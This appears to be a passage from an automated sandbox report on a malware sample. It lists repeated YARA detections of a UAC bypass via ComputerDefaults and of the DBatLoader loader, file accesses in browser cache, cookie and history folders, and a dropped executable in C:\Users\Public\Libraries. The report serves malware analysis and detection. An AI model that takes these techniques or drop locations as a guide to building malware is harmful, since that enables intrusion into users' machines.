00000016.00000003.412167968.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387720414.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388469578.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.392863466.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.412264006.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404864210.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387639999.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394708025.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.369937246.0000000004C08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370709496.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387362144.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.386135191.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371742531.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388122427.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.383727813.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.392261954.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394983555.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370770459.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.375191292.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401796956.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.418767534.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404576835.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393212324.0000000004D3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.402893922.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.374078638.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401943428.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.420712340.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.372662160.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.398438534.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.376754934.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389050386.0000000004C14000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.396347292.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384725664.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.372225220.0000000004C38000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389998532.0000000004D38000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387827442.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.380615611.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370021498.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.399220875.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389133615.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391522517.0000000004D38000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370982630.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 28442FC InternetOpen
crosoft\Windows\INetCache directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 28442FC InternetOpen
crosoft\Windows\INetCookies directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 28442FC InternetOpen
crosoft\Windows\INetCookies directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Microsoft\Windows\History read data or list device directory file | object name collision 1 28442FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
File Read
File Path Offset Length Completion Count Source Address Symbol
General
Target ID: 27
Path: C:\Windows\System32\drivers\rdpvideominiport.sys
Commandline:
Imagebase: 0x7ff7338d0000
Has administrator
privileges:
General
Target ID: 28
Path: C:\Windows\SysWOW64\WerFault.exe
Imagebase: 0xb60000
General
Target ID: 29
Path: C:\Windows\System32\drivers\rdpdr.sys
Commandline:
Imagebase:
Has administrator
privileges:
General
Target ID: 31
Path: C:\Windows\System32\drivers\tsusbhub.sys
Commandline:
Imagebase:
General
Target ID: 34
Path: C:\Users\Public\Libraries\Scxozm.exe
Commandline: C:\Users\Public\Libraries\Scxozm.exe
Imagebase: 0x400000
Path: C:\Users\Public\Libraries\Scxozm.exe
Commandline: C:\Users\Public\Libraries\Scxozm.exe
Imagebase: 0x400000
Disassembly
⊘ No disassembly